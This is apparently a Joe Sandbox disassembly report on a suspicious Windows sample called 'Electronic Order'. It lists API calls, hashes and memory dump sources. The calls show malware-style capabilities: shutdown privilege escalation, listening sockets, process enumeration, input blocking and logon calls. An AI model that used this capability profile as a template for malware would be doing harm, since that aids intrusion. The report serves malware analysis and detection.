                                      • Opcode ID: d8b5aa674b9df5de5309d4653aef0c58f3d8d8e05aead4f4a7797c9680883822
                                      • Instruction ID: 342aa3625e59cb3a637665a915e00da174b826335854ba1c85bd0e68e286d7f0
                                      • Opcode Fuzzy Hash: d8b5aa674b9df5de5309d4653aef0c58f3d8d8e05aead4f4a7797c9680883822
                                      • Instruction Fuzzy Hash: 7F129A70A0060ADFDF14DFA5D981AEEB7F5FF48300F14426AE446A7254EB35AE91CB60
                                      APIs
                                        • Part of subcall function 00E18CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E18D0D
                                        • Part of subcall function 00E18CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E18D3A
                                        • Part of subcall function 00E18CC3: GetLastError.KERNEL32 ref: 00E18D47
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00E2549B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: c181d304039d06b799563cae0eea2cb000846291ef741ef3e6df3c43799e5bee
                                      • Instruction ID: a72e8dad905ee5cc87744d0c80df2959e10e11ea893ef536380f5e2420eef8bd
                                      • Opcode Fuzzy Hash: c181d304039d06b799563cae0eea2cb000846291ef741ef3e6df3c43799e5bee
                                      • Instruction Fuzzy Hash: 31012832655A312EE7287774BE4ABFAF258AB01757F242021FC27F20D2D6B00C804590
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E365EF
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E365FE
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E3661A
                                      • listen.WSOCK32(00000000,00000005), ref: 00E36629
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36643
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E36657
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: dab4309bbdd1b8fd53d62b6423a4efe91a0e94bee56454f192bbb06db015a27a
                                      • Instruction ID: 7b1e87719532d7af77c602763f5ac1488677553704aa3e89f2033c9c720c3f12
                                      • Opcode Fuzzy Hash: dab4309bbdd1b8fd53d62b6423a4efe91a0e94bee56454f192bbb06db015a27a
                                      • Instruction Fuzzy Hash: 94219135200200AFCB10AF65C94AF6EBBF9EF49724F158159E956F72D1CB70AD05CB61
                                      APIs
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                      • _memmove.LIBCMT ref: 00E1062F
                                      • _memmove.LIBCMT ref: 00E10744
                                      • _memmove.LIBCMT ref: 00E107EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                      • String ID:
                                      • API String ID: 1300846289-0
                                      • Opcode ID: d2dfb09e70a3983337d340c4e7ef251f328b807581928441de144374a755f4c9
                                      • Instruction ID: 1475892d1e9cace6df30879fdc39139557440685afc59c1528be3fe1389e54a8
                                      • Opcode Fuzzy Hash: d2dfb09e70a3983337d340c4e7ef251f328b807581928441de144374a755f4c9
                                      • Instruction Fuzzy Hash: D7029170A00205DFDF14DF65D981AAE7BB5FF44300F14806AE80AEB395EB71DA94DBA1
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00DC19FA
                                      • GetSysColor.USER32(0000000F), ref: 00DC1A4E
                                      • SetBkColor.GDI32(?,00000000), ref: 00DC1A61
                                        • Part of subcall function 00DC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00DC12D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ColorProc$LongWindow
                                      • String ID:
                                      • API String ID: 3744519093-0
                                      • Opcode ID: 84bceb72f75809626221d66dd9a3689fbcbda7843cec302f54e71af4a60d6e64
                                      • Instruction ID: 09f6e51363d121f5f4b3cc68c4bc42cc2fa164998645db7a7a2c433be81da7ca
                                      • Opcode Fuzzy Hash: 84bceb72f75809626221d66dd9a3689fbcbda7843cec302f54e71af4a60d6e64
                                      • Instruction Fuzzy Hash: 32A1777810656BBEE628AB299C49F7F359DDB43351F29411EF543E7193CE20CC0296B2
                                      APIs
                                        • Part of subcall function 00E380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E380CB
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E36AB1
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36ADA
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E36B13
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36B20
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E36B34
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 99427753-0
                                      • Opcode ID: 57ec3bb53cc8c9b634748d8ec94c8afecaa2517eeaf8048e291b94021fa3275b
                                      • Instruction ID: 99d38e8c5e52b31e0e45e1a9f2793a888e76d7129b7550aa56714b350f26960d
                                      • Opcode Fuzzy Hash: 57ec3bb53cc8c9b634748d8ec94c8afecaa2517eeaf8048e291b94021fa3275b
                                      • Instruction Fuzzy Hash: A941B575700611AFEB10AF24DC9AF6EBBA9DB45B10F04805CF91AAB2D2CA705D018BB1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 4b9029a288644768ae024b62af67ccbe88f53f492623466c570e2b23b34f30aa
                                      • Instruction ID: 90e1ecd558988513d1b0ae1e431f92f49c80c056d333ce3a2e5690b39b6c1960
                                      • Opcode Fuzzy Hash: 4b9029a288644768ae024b62af67ccbe88f53f492623466c570e2b23b34f30aa
                                      • Instruction Fuzzy Hash: 7711C432700911AFE7212F27EC44B6FB798EF45721B425469F806F7252CB74DD02CAA5
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E01D88,?), ref: 00E3C312
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E3C324
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 41e38b6f830fd3d27dcf31f2fcd8e656068bb6718fb112907ac1d4b471e69a10
                                      • Instruction ID: 69b395e221cda0fe0e13fdc93731c5358b3a0d299173e85336a83c9085ef6787
                                      • Opcode Fuzzy Hash: 41e38b6f830fd3d27dcf31f2fcd8e656068bb6718fb112907ac1d4b471e69a10
                                      • Instruction Fuzzy Hash: 54E01274601713CFDB205F26D808A567AD4EF09B59F90D479E895F2750E770D841CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf
                                      • String ID:
                                      • API String ID: 674341424-0
                                      • Opcode ID: 2242fd00d3298cba85f1d97848acd348372482fc32004621fc9dbc77dfbaac08
                                      • Instruction ID: c75e4777b1557b7b8568a66e87d7819e551c3287209ae77096cef50357f5d0a4
                                      • Opcode Fuzzy Hash: 2242fd00d3298cba85f1d97848acd348372482fc32004621fc9dbc77dfbaac08
                                      • Instruction Fuzzy Hash: 03227A716083419FD724DF24C891B6BB7E4EF84704F14492EF89AA7391DB71EA44CBA2
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E3F151
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E3F15F
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E3F21F
                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E3F22E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                      • String ID:
                                      • API String ID: 2576544623-0
                                      • Opcode ID: 8b7f3aa7f0f6422f58e863a6c0cba9db7725e406b3ab53eabe49d662a6168293
                                      • Instruction ID: 4e598bc541cde88857f9a190042f23fcd63d37ea309bf329d68854a3468f3f23
                                      • Opcode Fuzzy Hash: 8b7f3aa7f0f6422f58e863a6c0cba9db7725e406b3ab53eabe49d662a6168293
                                      • Instruction Fuzzy Hash: 67516B71504701AFD310EF21DC85F6BBBE8EF94710F10482DF495972A2EB70A909CBA2
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E240D1
                                      • _memset.LIBCMT ref: 00E240F2
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E24144
                                      • CloseHandle.KERNEL32(00000000), ref: 00E2414D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: c91b4676f4c68d616b2a0ced2d1acb3a92e246151f43c4d02a5dcab47f00b85a
                                      • Instruction ID: 1e4a77b77c96eda9e98bdaca6e036ba9e8cc3e5d533125a728e75e5a456d4b9e
                                      • Opcode Fuzzy Hash: c91b4676f4c68d616b2a0ced2d1acb3a92e246151f43c4d02a5dcab47f00b85a
                                      • Instruction Fuzzy Hash: DE11EB759012387AD7305BA5AC4DFABBB7CEF45B60F104196F908E7180D6744E848BA4
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E1EB19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($|
                                      • API String ID: 1659193697-1631851259
                                      • Opcode ID: 99a4e623ffc1f05f612e0ae6a12ca10f4834d4f9a1f4e7890dd5c1de4b849c97
                                      • Instruction ID: dbf5fc87fca90be5b2937333d78bc618edafc37d566f151cc22cc25160811d7c
                                      • Opcode Fuzzy Hash: 99a4e623ffc1f05f612e0ae6a12ca10f4834d4f9a1f4e7890dd5c1de4b849c97
                                      • Instruction Fuzzy Hash: 37321575A046059FDB28CF19C481AAAF7F1FF48310B15D56EE89AEB3A1D770E981CB40
                                      APIs
                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E326D5
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E3270C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 75519a2c46d083b4c7a5d4be1a06faa94a8896ea370e116dfda31f4fb1c5ae9f
                                      • Instruction ID: 62376460f4835ae4ca84a4caeb0b9247c3ba02efe109773a0d44e7196141b95f
                                      • Opcode Fuzzy Hash: 75519a2c46d083b4c7a5d4be1a06faa94a8896ea370e116dfda31f4fb1c5ae9f
                                      • Instruction Fuzzy Hash: 7C41D475900209BFEB209A55DC8AEBBBBBCEF40718F10506EF785B6140EA719E41D664
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2B5AE
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E2B608
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E2B655
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: e9b37739a5a49076fbd217102f5ee0d80ba6d8a8918ba7ed24edb03bc23c5145
                                      • Instruction ID: 497ea893d44e1ad7b2826d8ece9680823de8576ab813f8fb3b341ecc0699934a
                                      • Opcode Fuzzy Hash: e9b37739a5a49076fbd217102f5ee0d80ba6d8a8918ba7ed24edb03bc23c5145
                                      • Instruction Fuzzy Hash: 25215135A00518EFCB00EF65D884EADBBB8FF49310F1480A9E905EB351DB31A956CB61
                                      APIs
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E18D0D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E18D3A
                                      • GetLastError.KERNEL32 ref: 00E18D47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                      • String ID:
                                      • API String ID: 1922334811-0
                                      • Opcode ID: f10ca0ef9e95ff1a5e4010dbc9d98d6194b92a4cd96f524c5e0732e4f2a1e6f0
                                      • Instruction ID: 7d1b7072a2975384910b421e60202ab60f6d9b79b0b54a83c9c6387516a4e8dd
                                      • Opcode Fuzzy Hash: f10ca0ef9e95ff1a5e4010dbc9d98d6194b92a4cd96f524c5e0732e4f2a1e6f0
                                      • Instruction Fuzzy Hash: 43118FB1514309AFD728AF55ED85DABB7BDEB44710B20852EF456A3241EF70AC818A70
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E24C2C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E24C43
                                      • FreeSid.ADVAPI32(?), ref: 00E24C53
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: 9ec13bb81f4d5dfa655bd07450a5139c98176029b48f4b0e36ba5d39374a0700
                                      • Instruction ID: 2518082c9f7bc8b913df2e9abb100a192f0f2699d552f23c5b3636df9cee8164
                                      • Opcode Fuzzy Hash: 9ec13bb81f4d5dfa655bd07450a5139c98176029b48f4b0e36ba5d39374a0700
                                      • Instruction Fuzzy Hash: 65F04F7591130CBFDF04DFF4DC89AAEB7BCEF08601F004469E501E2181D6705A048B50
                                      APIs
                                      • __time64.LIBCMT ref: 00E28B25
                                        • Part of subcall function 00DE543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E291F8,00000000,?,?,?,?,00E293A9,00000000,?), ref: 00DE5443
                                        • Part of subcall function 00DE543A: __aulldiv.LIBCMT ref: 00DE5463
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem__aulldiv__time64
                                      • String ID: 0u
                                      • API String ID: 2893107130-1339160046
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E2C966
                                      • FindClose.KERNEL32(00000000), ref: 00E2C996
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E3977D,?,00E4FB84,?), ref: 00E2A302
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E3977D,?,00E4FB84,?), ref: 00E2A314
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E18851), ref: 00E18728
                                      • CloseHandle.KERNEL32(?,?,00E18851), ref: 00E1873A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DE8F97,?,?,?,00000001), ref: 00DEA39A
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DEA3A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00E34218
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      APIs
                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E24F18
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E188D1), ref: 00E18CB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00E02242
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00DEA36A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 672295fb1ac58aa318c1a236b792c671f5d06fd943c1316149b9605cb54572d5
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 24C15C3B3091D309DB2D563B943413EBAA15EA27B131E0B6DE8B2CB5D4EF30D5649670
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: 91692b71e4edf465bae73223bdca1a29e3440aba5b9b5d71a6fe3d8067a90483
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: 1441C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: eb51c67c1222c9ad3fffd16e36ff724c4697cd81df6116bb094e53200c7009a5
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: 9E019278A00109EFCB84EF98C5909AEF7F5FB48710F208599D809AB701E731EE41DB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: 166ad7b235f67322d539830bce0e12fb17899f236dd09d7a349ea0dac3b9d1af
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
